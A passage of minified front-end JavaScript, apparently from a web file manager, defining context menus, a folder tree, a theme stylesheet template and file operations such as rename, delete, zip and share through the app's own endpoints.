e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/shareCommon/rightMenu",[],function(){var e=".menu-file",t=".menu-folder",a=".menu-more",i=".menu-tree-root",n=".menu-tree-folder",o=".menu-tree-file",s={"list-icon":{name:LNG.list_type,icon:"eye-open",items:{"set-icon":{name:LNG.list_icon,className:"menu-set-icon set-icon"},"set-list":{name:LNG.list_list,className:"menu-set-icon set-list"}}},"sort-by":{name:LNG.order_type,accesskey:"y",icon:"sort",items:{"set-sort-name":{name:LNG.name,className:"menu-set-sort set-sort-name"},"set-sort-ext":{name:LNG.type,className:"menu-set-sort set-sort-ext"},"set-sort-size":{name:LNG.size,className:"menu-set-sort set-sort-size"},"set-sort-mtime":{name:LNG.modify_time,className:"menu-set-sort set-sort-mtime"},sep105:"--------","set-sort-up":{name:LNG.sort_up,className:"menu-set-desc set-sort-up"},"set-sort-down":{name:LNG.sort_down,className:"menu-set-desc set-sort-down"}}},"set-file-icon-size":{name:LNG.file_size_title,icon:"picture",className:"set-file-icon-size",items:{"box-size-smallx":{name:LNG.file_size_small_super,className:"file-icon-size box-size-smallx"},"box-size-small":{name:LNG.file_size_small,className:"file-icon-size box-size-small"},"box-size-default":{name:LNG.file_size_default,className:"file-icon-size box-size-default"},"box-size-big":{name:LNG.file_size_big,className:"file-icon-size box-size-big"},"box-size-bigx":{name:LNG.file_size_big_super,className:"file-icon-size box-size-bigx"}}}},r=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1}),c(),d(),p(),u(),m(),v(),k(),y(),$(".set-set-"+G.userConfig.listType).addClass("selected"),$(".set-sort-"+G.userConfig.listSortField).addClass("selected"),$(".set-sort-"+G.userConfig.listSortOrder).addClass("selected"),$(".context-menu-root").addClass("animated fadeIn")},l=function(){$('').appendTo("body"),$(".context-menu-list").die("click").live("click",function(e){return stopPP(e),!1}),m(),k(),g(),b(),y(),$(".context-menu-root").addClass("animated fadeIn")},c=function(){$.contextMenu({selector:".menu-body-main",className:"file-continer-menu",zIndex:9999,callback:function(e,t){f(e,t)},items:{refresh:{name:LNG.refresh+"F5",className:"refresh",icon:"refresh",accesskey:"e"},sep1:"--------","list-icon":s["list-icon"],"sort-by":s["sort-by"],"set-file-icon-size":s["set-file-icon-size"],sep10:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},d=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:t,className:t.substr(1),callback:function(e){h(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"folder-open-alt",accesskey:"o"},down:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",search:{name:LNG.search_in_path+"Ctrl+F",className:"search",icon:"search",accesskey:"s"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"},sep2:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},p=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:e,className:e.substr(1),callback:function(e){h(e)},items:{open:{name:LNG.open+"Enter",className:"open",icon:"external-link",accesskey:"o"},"open-with":{name:LNG.open_with,icon:"external-link",className:"open-with",accesskey:"a",items:{"open-with-first":{name:"",className:"hidden open-with-first"}}},down:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},"show-file":{name:LNG.show_file,className:"show-file",icon:"globe",accesskey:"b"},sep1:"--------",info:{name:LNG.info+"Alt+I",className:"info",icon:"info",accesskey:"i"}}})},u=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:a,className:a.substr(1),callback:function(e){h(e)},items:{down:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},f=function(e){switch(e){case"refresh":ui.f5(!0,!0);break;case"set-icon":ui.setListType("icon");break;case"set-list":ui.setListType("list");break;case"set-sort-name":ui.setListSort("name",0);break;case"set-sort-ext":ui.setListSort("ext",0);break;case"set-sort-size":ui.setListSort("size",0);break;case"set-sort-mtime":ui.setListSort("mtime",0);break;case"set-sort-up":ui.setListSort(0,"up");break;case"set-sort-down":ui.setListSort(0,"down");break;case"info":ui.path.info();break;case"box-size-smallx":ui.setFileIconSize(40);break;case"box-size-small":ui.setFileIconSize(60);break;case"box-size-default":ui.setFileIconSize(80);break;case"box-size-big":ui.setFileIconSize(150);break;case"box-size-bigx":ui.setFileIconSize(220);break;case"open":ui.path.open();break;default:}},h=function(e){switch(e){case"open":ui.path.open();break;case"down":ui.path.download();break;case"search":ui.path.search();break;case"show-file":ui.path.shareFile();break;case"open-project":ui.path.openProject();break;case"info":ui.path.info();break;default:}},m=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:i,callback:function(e){x(e)},items:{download:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep2:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},v=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:n,callback:function(e){x(e)},items:{download:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"},sep2:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},g=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:n,callback:function(e){x(e)},items:{download:{name:LNG.download,className:"down",icon:"download",accesskey:"x"},sep1:"--------",search:{name:LNG.search_in_path,className:"search",icon:"search",accesskey:"s"},explorer:{name:LNG.manage_folder,className:"explorer",icon:"laptop",accesskey:"v"},"open-project":{name:LNG.openProject,className:"open-project",icon:"edit"},sep2:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},b=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:o,callback:function(e){x(e)},items:{open:{name:LNG.open,className:"open",icon:"external-link",accesskey:"o"},"open-with":{name:LNG.open_with,icon:"external-link",className:"open-with",accesskey:"a",items:{"open-with-first":{name:"",className:"hidden open-with-first"}}},download:{name:LNG.download,className:"download",icon:"download",accesskey:"x"},"show-file":{name:LNG.show_file,className:"show-file",icon:"globe",accesskey:"b"},sep1:"--------",info:{name:LNG.info,className:"info",icon:"info",accesskey:"i"}}})},y=function(){$('').appendTo("#rightMenu"),$.contextMenu({zIndex:9999,selector:".menu-taskbar",items:{"quit-others":{name:LNG.close_others,className:"quit-others",icon:"remove-circle",accesskey:"o"},quit:{name:LNG.close,className:"quit",icon:"remove",accesskey:"q"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"quit-others":$.each($.dialog.list,function(e,t){a!=e&&t.close()});break;case"quit":i.close()}}})},k=function(){$.contextMenu({zIndex:9999,selector:".task-tab",items:{"close-all":{name:LNG.dialog_close_all,icon:"remove-circle",accesskey:"q"},"show-all":{name:LNG.dialog_display_all,icon:"th-large",accesskey:"s"},"hide-all":{name:LNG.dialog_min_all,icon:"remove",accesskey:"h"}},callback:function(e,t){var a=t.$trigger.attr("id");switch($.dialog.list[a],e){case"show-all":$.each($.dialog.list,function(e,t){t.display(!0)});break;case"hide-all":$.each($.dialog.list,function(e,t){t.display(!1)});break;case"close-all":$.each($.dialog.list,function(e,t){t.close()});break;default:}}})},x=function(e){switch(e){case"open":ui.tree.open();break;case"refresh":ui.tree.refresh();break;case"info":ui.tree.info();break;case"explorer":ui.tree.explorer();break;case"open-project":ui.tree.openProject();break;case"show-file":ui.tree.showFile();break;case"download":ui.tree.download();break;case"search":ui.tree.search();break;case"refresh-all":ui.tree.init();break;case"quit":break;default:}};return{initExplorer:r,initEditor:l}}),define("app/src/shareEditor/ui",[],function(){var e=function(){var e=!1,t=0,a=0,i=0,n=$(".frame-left"),o=$(".frame-resize"),s=$(".frame-right");o.die("mousedown").live("mousedown",function(e){return 1!=e.which?!0:(r(e),this.setCapture&&this.setCapture(),$(document).mousemove(function(e){l(e)}),$(document).one("mouseup",function(e){return c(e),this.releaseCapture&&this.releaseCapture(),stopPP(e),!1}),stopPP(e),!1)});var r=function(i){e=!0,t=i.pageX,a=$(".frame-left").width(),o.addClass("active"),$(".resize-mask").css("display","block")},l=function(r){if(!e)return!0;var l=r.pageX-t,c=a+l;i>c&&(c=i),c>$(document).width()-200&&(c=$(document).width()-200),n.css("width",c),o.css("left",c-5),s.css("left",c+1)},c=function(){return e?(e=!1,o.removeClass("active"),$(".resize-mask").css("display","none"),void 0):!1}},t=function(){$(".tools-left a").click(function(){var e=$(this).attr("class");switch(e){case"home":tree.init();break;case"view":tree.explorer();break;case"folder":tree.create("folder");break;case"file":tree.create("file");break;case"refresh":tree.init();break;default:}})};return{init:function(){e(),t(),tree.init(),Mousetrap.bind(["ctrl+s","command+s"],function(e){e.preventDefault(),e.returnvalue=!1,ShareData.frameTop("OpenopenEditor",function(e){e.Editor.save()})})},setTheme:function(e){core.setSkin(e,"app_editor.css"),ShareData.frameTop("OpenopenEditor",function(t){t.Editor.setTheme(e)})},editorFull:function(){var e=$("iframe[name=OpenopenEditor]");e.toggleClass("frame-fullscreen")},fileHistory:function(e){var t=G.project;if(G.sid!==void 0&&(t=t+"__"+G.sid),t="editorHistory_"+t,void 0==e){var a=LocalData.get(t);return a=jsonDecode(a),$.isArray(a)||(a=[]),a}LocalData.set(t,jsonEncode(e))}}}),define("app/common/tree",["../path/pathOperate","../path/clipboard","../path/search"],function(e){var t,a,i=e("../path/pathOperate"),n=e("../path/clipboard"),o=e("../path/search"),s=!1;ui.pathOperate=i;var r=function(e,t){var a=["menu-tree-group","menu-tree-fav","menu-tree-folder-fav"];if(e&&e[0]&&-1!==$.inArray(e[0].menuType,a))return e;for(var i=[],n=[],o=0;e.length>o;o++)e[o].drop=!1,e[o].drag=!1,e[o].name=e[o].name,e[o].isParent&&e[o].children&&(e[o].children=r(e[o].children)),e[o].isWriteable,"folder"==e[o].type?n.push(e[o]):i.push(e[o]); -return t?e:(n=n.sort(function(e,t){var e=e.name,t=t.name;return pathTools.strSort(e,t)}),i=i.sort(function(e,t){var e=e.name,t=t.name;return pathTools.strSort(e,t)}),n.concat(i))},l=function(){var e={},t="tree_open_"+md5(Config.pageApp),i=function(e){if(!LocalData.support())return{};if(void 0==e){var a=LocalData.getConfig(t);return 0==a?{}:a}LocalData.setConfig(t,e)},n=function(t){for(var a=0;t.length>a;a++){var i=t[a].path;void 0!==e[i]&&(t[a].open=e[i])}return t},o=function(){for(var t=a.getNodesByFilter(function(e){return 0==e.level?!0:!1}),n={},o=0;t.length>o;o++)n[t[o].path]=t[o].open;return e=n,i(e),e};return e=i(),{list:function(){return e},reset:n,save:o}}(),c=function(){$.ajax({url:G.appHost+Config.treeAjaxURL+"&type=init",dataType:"json",error:function(){$("#folder-list-tree").html('
      '+LNG.system_error+"
      ")},success:function(e){if(!e.code)return $("#folder-list-tree").html('
      '+LNG.system_error+"
      "),void 0;var t=r(e.data,!0);t=l.reset(t),$.fn.zTree.init($("#folder-list-tree"),u,t),a=$.fn.zTree.getZTreeObj("folder-list-tree")}}),$(".ztree .switch").die("mouseenter").live("mouseenter",function(){$(this).addClass("switch_hover")}).die("mouseleave").live("mouseleave",function(){$(this).removeClass("switch_hover")}),core.isApp("editor")&&(Mousetrap.bind("up",function(e){d(e,"up")}).bind("down",function(e){d(e,"down")}).bind("left",function(e){d(e,"left")}).bind("right",function(e){d(e,"right")}),Mousetrap.bind("enter",function(){tree.open()}).bind(["del","command+backspace"],function(){tree.remove()}).bind("f2",function(e){stopPP(e),tree.rname()}).bind(["ctrl+f","command+f"],function(e){stopPP(e),tree.search()}).bind(["ctrl+c","command+c"],function(){tree.copy()}).bind(["ctrl+x","command+x"],function(){tree.cute()}).bind(["ctrl+v","command+v"],function(){tree.past()}).bind("alt+m",function(){tree.create("folder")}).bind("alt+n",function(){tree.create("file")}))},d=function(e,t){stopPP(e);var i=a.getSelectedNodes()[0];if(i)switch(t){case"up":var n=i.getPreNode();if(n){if(n.open&&n.children.length>0)for(;n.open&&n.children&&n.children.length>=1;)n=n.children[n.children.length-1]}else n=i.getParentNode();a.selectNode(n);break;case"down":if(i.open&&i.children.length>=1)n=i.children[0];else{var o=i,n=o.getNextNode()||o.getParentNode().getNextNode();try{for(;!n;)o=o.getParentNode(),n=o.getNextNode()||o.getParentNode().getNextNode()}catch(e){}}a.selectNode(n);break;case"left":i.isParent?i.open?a.expandNode(i,!1):a.selectNode(i.getParentNode()):a.selectNode(i.getParentNode());break;case"right":i.open?a.selectNode(i.children[0]):a.expandNode(i,!0);break;default:}},p=function(){return core.isApp("editor")?!1:!0},u={async:{enable:!0,dataType:"json",url:function(){return G.appHost+Config.treeAjaxURL},autoParam:["ajax_path=path","tree_icon=tree_icon"],dataFilter:function(e,t,a){return a.code?r(a.data):null}},edit:{enable:!0,showRemoveBtn:!1,showRenameBtn:!1,drag:{isCopy:!1,isMove:!1}},view:{showLine:!1,selectedMulti:!1,expandSpeed:"fast",dblClickExpand:!1,addDiyDom:function(e,t){var a=15,i=$("#"+t.tId+"_switch"),n=$("#"+t.tId+"_ico");i.remove(),t.iconSkin=t.tree_icon;var o=t.tree_icon;if(t.ext?o=t.ext:t.tree_icon||(o=t.type),n.before(i).before(''+core.iconSmall(o)+"").remove(),void 0!=t.ext&&n.attr("class","").addClass("file "+t.ext).removeAttr("style"),t.level>=1){var s="";i.before(s)}i.before("");var r="";void 0!=t.menuType?r=t.menuType:(("file"==t.type||"oexe"==t.ext)&&(r="menu-tree-file"),"folder"==t.type&&(r="menu-tree-folder"));var l=LNG.name+":"+t.name+"\n"+LNG.size+":"+pathTools.fileSize(t.size)+"\n"+LNG.modify_time+":"+t.mtime;"file"!=t.type&&(l=t.name),i.parent().addClass(r).attr("title",l),0==t.isWriteable&&i.parent().addClass("file-not-writeable"),0==t.isReadable&&i.parent().addClass("file-not-readable"),0===t.exists&&i.parent().addClass("file-not-readable")}},callback:{onClick:function(e,t,i){if($(e.target).hasClass("menu-item")||$(e.target).parent().hasClass("menu-item")){var n=$("#"+i.tId+"_a"),o=n.find(".menu-item");return n.contextMenu({x:o.offset().left+o.width(),y:o.offset().top}),stopPP(e)}return a.selectNode(i),core.isApp("editor")&&"folder"==i.type?(a.expandNode(i),void 0):(core.isApp("editor")||"folder"!=i.type?(kodApp.setLastOpenTarget($("#"+i.tId)),kodApp.open(f().path)):ui.path.list(i.path),void 0)},beforeDblClick:function(){return!0},onCollapse:function(e,t,a){0==a.level&&l.save()},onExpand:function(e,t,a){0==a.level&&l.save()},onDblClick:function(e,t,i){return $(e.target).hasClass("switch")||!p()?!1:(a.expandNode(i),void 0)},beforeRightClick:function(e,t){a.selectNode(t)},beforeAsync:function(e,t){t.ajax_name=t.name,t.ajax_path=t.path,$("#"+t.tId+"_my_ico").addClass("ico_loading")},onAsyncSuccess:function(e,i,n,o){return $("#"+n.tId+"_my_ico").removeClass("ico_loading"),0==o.data.length?(a.removeChildNodes(n),void 0):("function"==typeof t&&(t(),t=void 0),void 0)},onRename:function(e,n,o){var s=o.getParentNode();if(a.getNodesByParam("name",o.name,s).length>1)return Tips.tips(LNG.name_isexists,!1),a.removeNode(o),void 0;if(o.create){var r=o.path+"/"+o.name;"folder"==o.type?i.newFolder(r,function(){t=function(){var e=a.getNodesByParam("name",o.name,s)[0];a.selectNode(e),b()},h(s)}):i.newFile(r,function(){t=function(){var e=a.getNodesByParam("name",o.name,s)[0];a.selectNode(e),b()},h(s)})}else{var l=rtrim(o.path,"/"),c=core.pathFather(o.path)+o.name;i.rname(l,c,function(e){o.path=e,t=function(){var e=a.getNodesByParam("name",o.name,s)[0];a.selectNode(e),b(),"folder"==o.type&&ui.path.list(o.path)},h(s)})}},beforeDrag:function(e,t){for(var a=0,i=t.length;i>a;a++)if(t[a].drag===!1)return!1;return!0},beforeDrop:function(e,t,a){return a?a.drop!==!1:!0},onDrop:function(e,t,a,i){var o="",s="",r=a[0];(r.father||r.thisPath)&&(o=r.father+urlEncode(r.name),s=i.father+urlEncode(i.name),n.cuteDrag([{path:o,type:r.type}],s,function(){h(r)}))}}},f=function(e){if(a){var t=a.getSelectedNodes()[0],i="";return t?(i=t.type,("_null_"==i||void 0==i)&&(i="folder"),"file"==i&&(i=t.ext),e?[{path:t.path,type:i,node:t}]:{path:t.path,type:i,node:t}):{path:"",type:""}}},h=function(e){return e||(e=a.getSelectedNodes()[0]),e.isParent||(e=e.getParentNode())?(a.reAsyncChildNodes(e,"refresh"),void 0):(ui.tree.init(),void 0)},m=function(){g(G.KOD_USER_FAV),b()},v=function(){m(),g(G.KOD_GROUP_ROOT_SELF),g(G.KOD_GROUP_ROOT_ALL)},g=function(e){var t=a.getNodesByParam("path",e,null);h(t[0])},b=function(){core.isApp("explorer")&&ui.f5()};return{makeParam:f,treeOpenHistory:l,treeDataSort:r,init:c,refresh:h,refreshPath:g,refreshFav:m,refreshGroup:v,zTree:function(){return a},openEditor:function(){kodApp.open(f().path)},openWindow:function(){kodApp.openWindow(f().path)},share:function(){i.share(f())},download:function(){"folder"==f().type?i.zipDownload(f(!0)):kodApp.download(f().path)},setSelect:function(e){return},open:function(){if(!($(".dialog-path-remove").length>=1)){var e=f();"oexe"==e.type&&(e.path=e.node),kodApp.setLastOpenTarget($(".curSelectedNode").parent()),kodApp.open(e.path,e.type)}},fav:function(){var e=f();e.name=e.node.name,e.node="null",i.fav(e)},createLink:function(e){var t=f();i.createLink(t.path,t.node.name,t.type,e,b)},search:function(){o("",f().path)},appEdit:function(){var e=f(),t=e.node;t.path=e.path,i.appEdit(t,function(){h(e.node.getParentNode())})},info:function(){i.info(f(!0))},copy:function(){n.copy(f(!0))},cute:function(){n.cute(f(!0))},copyTo:function(){core.api.pathSelect({type:"folder",title:LNG.copy_to},function(e){n.copyDrag(f(!0),e,"",!1)})},cuteTo:function(){core.api.pathSelect({type:"folder",title:LNG.cute_to},function(e){n.cuteDrag(f(!0),e,function(){g()})})},past:function(){var e=f();e.node.isParent||(e.node=e.node.getParentNode()),n.past(e.path,function(){b(),h(e.node)})},clone:function(){var e=f();e.node.isParent||(e.node=e.node.getParentNode()),n.copyDrag(f(!0),core.pathFather(e.path),function(){b(),"folder"==e.type?h(e.node.getParentNode()):h(e.node)},!0)},favRemove:function(){i.favRemove(f().node.name,function(e){Tips.tips(e),m()})},remove:function(){var e=f(!0),t=e[0].node.getParentNode();e[0].type=e[0].node.type,e[0].type="folder"==e[0].type?"folder":"file",i.remove(e,function(){b(),h(t)})},checkIfChange:function(e){s||(s=!0,a&&(a.getNodesByFilter(function(t){var a=t.path;return"folder"==t.type&&core.pathClear(a)==core.pathClear(e)&&h(t),!1},!0),setTimeout(function(){s=!1},500)))},explorer:function(){var e=a.getSelectedNodes();if(0>=e.length){var t=a.getNodes();a.selectNode(t[0])}var i=f().path;"folder"!=f().type&&(i=core.pathFather(i)),core.explorer(i)},openProject:function(){core.explorerCode(f().path)},create:function(e){var i=a.getSelectedNodes();if(0>=i.length){var n=a.getNodes();a.selectNode(n[0])}else"file"==i[0].type&&a.selectNode(i[0].getParentNode());var o=f(),s=o.node,r=s.getParentNode(),l="newfile",c=0,d=LNG.newfolder;if("folder"==e){for(;a.getNodesByParam("name",d+"("+c+")",r).length>0;)c++;newNode={name:d+"("+c+")",ext:"",type:"folder",create:!0,path:o.path}}else{for(var p=e;a.getNodesByParam("name",l+"("+c+")."+p,r).length>0;)c++;newNode={name:l+"("+c+")."+p,ext:p,type:"file",create:!0,path:o.path}}if(void 0!=s.children){var u=a.addNodes(s,newNode)[0];a.editName(u)}else"folder"!=s.type&&(s=s.getParentNode()),t=function(){var e=a.addNodes(s,newNode)[0];a.editName(e)},s.isParent?a.expandNode(s):t()},showFile:function(){var e=G.appHost+"share/file&sid="+G.sid+"&user="+G.user+"&path="+f().path;window.open(e)},rname:function(){var e=a.getSelectedNodes()[0];a.editName(e),e.beforeName=e.name}}}),define("app/path/pathOperate",[],function(e){tplFileInfo=e("./tpl/fileinfo/fileInfo.html"),tplPathInfo=e("./tpl/fileinfo/pathInfo.html");var t=["/","\\",":","*","?",'"',"<",">","|"],a=["/","\\"],i=function(e){var i=function(e,t){for(var a=t.length,i=0;a>i;i++)if(e.indexOf(t[i])>0)return!0;return!1},n=a;return G.systemOS&&"windows"==G.systemOS&&(n=t),i(e,n)?(Tips.tips(LNG.path_not_allow+": "+n.join(", "),!1),!1):!0},n=function(e){for(var t=[],a=function(e){return e?e.replace(/"/g,'\\\\"'):e},i=0;e.length>i;i++)t.push({type:a(e[i].type),path:urlEncode(a(e[i].path))});return"dataArr="+jsonEncode(t)},o=function(e,t){if(e){var a=core.pathThis(e);return i(a)?($.ajax({dataType:"json",url:G.appHost+"explorer/mkfile&path="+urlEncode(e),beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&(e&&e.info?t(e.info):t(!1))}}),void 0):("function"==typeof t&&t(),void 0)}},s=function(e,t){if(e){var a=core.pathThis(e);return i(a)?($.ajax({dataType:"json",url:G.appHost+"explorer/mkdir&path="+urlEncode(e),beforeSend:function(){"function"==typeof t&&Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&(e&&e.info?t(e.info):t(!1))}}),void 0):("function"==typeof t&&t(),void 0)}},r=function(e,t,a){return e&&t&&e!=t?i(core.pathThis(t))?($.ajax({type:"POST",dataType:"json",url:G.appHost+"explorer/pathRname",data:"path="+urlEncode(e)+"&rnameTo="+urlEncode(t),beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof a&&(e&&e.info?a(e.info):a(!1))}}),void 0):("function"==typeof a&&a(),void 0):void 0},l=function(e,t,a,i){if(a=void 0==a?!1:a,i=void 0==i?!1:i,window.event&&window.event.shiftKey&&(i=!0),!(1>e.length)){var o=LNG.remove_title,s=LNG.remove_info,r=G.appHost+"explorer/pathDelete",l=n(e);if("share"==e[0].type&&(o=LNG.share_remove,s=LNG.share_remove_tips,r=G.appHost+"userShare/del"),i&&(s=LNG.remove_info_force,o=LNG.remove_title_force,r+="&shiftDelete=1"),("recycle-clear"==e[0].type||G.USER_RECYCLE&&G.thisPath==G.USER_RECYCLE||G.thisPath==core.pathFather(G.myhome)+"recycle_kod/")&&(s=LNG.recycle_clear_info,r=G.appHost+"explorer/pathDeleteRecycle",o=LNG.recycle_clear,"recycle-clear"==e[0].type&&(l="postEmpty=1")),e[0]&&e[0].path){var c=""+htmlEncode(core.pathThis(e[0].path))+"";s=e.length>1?c+' ... '+e.length+LNG.remove_item+"
      "+s:c+"
      "+s}var d=function(){$.ajax({url:r,type:"POST",dataType:"json",data:l,beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(a){if(Tips.close(a),ShareData.frameTop("",function(e){e.ui.f5()}),"share"==e[0].type){G.selfShare=a.info;var i=$.dialog.list["share-dialog"];void 0!=i&&i.close()}o==LNG.recycle_clear?core.playSound("recycle_clear"):core.playSound("file_remove"),"function"==typeof t&&t(a)}})};a?d():$.dialog({id:"dialog-path-remove",fixed:!0,icon:"question",title:o,padding:"40px 40px",lock:!0,background:"#000",opacity:.1,content:"
      "+s+"
      ",ok:d,cancel:!0})}},c=function(e){if(core.authCheck("explorer.fileDownload",!0)&&!(1>e.length)){var t=G.appHost+"explorer/zipDownload";G.sharePage!==void 0&&(t=G.appHost+"share/zipDownload&user="+G.user+"&sid="+G.sid),$.ajax({url:t,type:"POST",dataType:"json",data:n(e),beforeSend:function(){Tips.loading(LNG.zip_download_ready)},error:core.ajaxError,success:function(e){Tips.close(e),Tips.tips(e);var t=G.appHost+"explorer/fileDownloadRemove&path="+urlEncode(e.info);t+="&accessToken="+G.accessToken,G.sharePage!==void 0&&(t=G.appHost+"share/fileDownloadRemove&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(e.info)),$.dialog({icon:"succeed",title:!1,time:2,content:LNG.download_ready+"..."}),$('').appendTo("body")}})}},d=function(e,t,a){1>e.length||(a||(a="zip"),$.ajax({url:G.appHost+"explorer/zip&fileType="+a,type:"POST",dataType:"json",data:n(e),beforeSend:function(){Tips.loading(LNG.ziping)},error:core.ajaxError,success:function(e){Tips.close(e),e.code&&core.playSound("drag_drop"),"function"==typeof t&&t(e.info)}}))},p=function(e,t,a){if(e){var i=function(e){$.ajax({url:e,beforeSend:function(){Tips.loading(LNG.unziping)},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&t(e)}})},n=G.appHost+"explorer/unzip&path="+urlEncode(e);"toThis"==a&&(n+="&toThis=1"),"toFolder"==a?core.api.pathSelect({type:"folder",title:LNG.unzip_to},function(e){n+="&pathTo="+e,i(n)}):i(n)}},u=function(e){var t=e.path,a=core.pathPre(t);if(a==G.KOD_GROUP_PATH||a==G.KOD_GROUP_SHARE||a==G.KOD_USER_SHARE)return Tips.tips(LNG.path_can_not_share,"warning"),void 0;var i="folder"==e.type?"folder":"file";1>t.length||core.authCheck("userShare.set",!0)&&$.ajax({url:G.appHost+"userShare/checkByPath&path="+urlEncode(t),dataType:"json",error:core.ajaxError,success:function(e){if(e.code)f(e.data);else{G.selfShare=e.info;var a={path:t,type:i,name:core.pathThis(t)};h(a,function(e){e.code?(G.selfShare=e.info,ui.f5(),f(e.data)):(Tips.tips(e),f(void 0,function(){$(".content-info input[name=type]").val(i),$(".content-info input[name=path]").val(t),$(".content-info input[name=name]").val(core.pathThis(t)+"(1)"),"file"==i&&($(".label-code-read").addClass("hidden"),$(".label-can-upload").addClass("hidden"))}))})}}})},f=function(t,a){0!=$(".share-dialog").length&&$(".share-dialog").shake(3,30,100),e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){m(t),void 0!=a&&a()})},h=function(e,t){$.ajax({url:G.appHost+"userShare/set",data:e,type:"POST",dataType:"json",beforeSend:function(){$(".share-create-button").addClass("disabled")},error:function(){Tips.tips(LNG.error,!1)},success:function(e){$(".share-create-button").removeClass("disabled"),void 0!=t&&t(e)}})},m=function(t){var a=e("./tpl/share.html"),i=template.compile(a),n=i({LNG:LNG});$.dialog({id:"share-dialog",simple:!0,resize:!1,width:425,title:LNG.share,padding:"0",fixed:!0,content:n});var o="zh-CN"==G.lang?"ch":"en";$("#share-time").datetimepicker({format:"Y/m/d",formatDate:"Y/m/d",timepicker:!1,lang:o}),$("#share-time").unbind("blur").bind("blur",function(e){stopPP(e)});var s=function(e){if($(".share-setting-more").addClass("hidden"),void 0==e)$(".share-has-url").addClass("hidden"),$(".share-action .share-remove-button").addClass("hidden"),$(".content-info input[name=sid]").val(""),$(".content-info input[name=type]").val(""),$(".content-info input[name=name]").val(""),$(".content-info input[name=showName]").val(""),$(".content-info input[name=path]").val(""),$(".content-info input[name=timeTo]").val(""),$(".content-info input[name=sharePassword]").val(""),$(".share-view-info").addClass("hidden");else{e.canUpload===void 0&&(e.canUpload=""),t=e,e.showName||(e.showName=e.name),$(".content-info input[name=sid]").val(e.sid),$(".content-info input[name=type]").val(e.type),$(".content-info 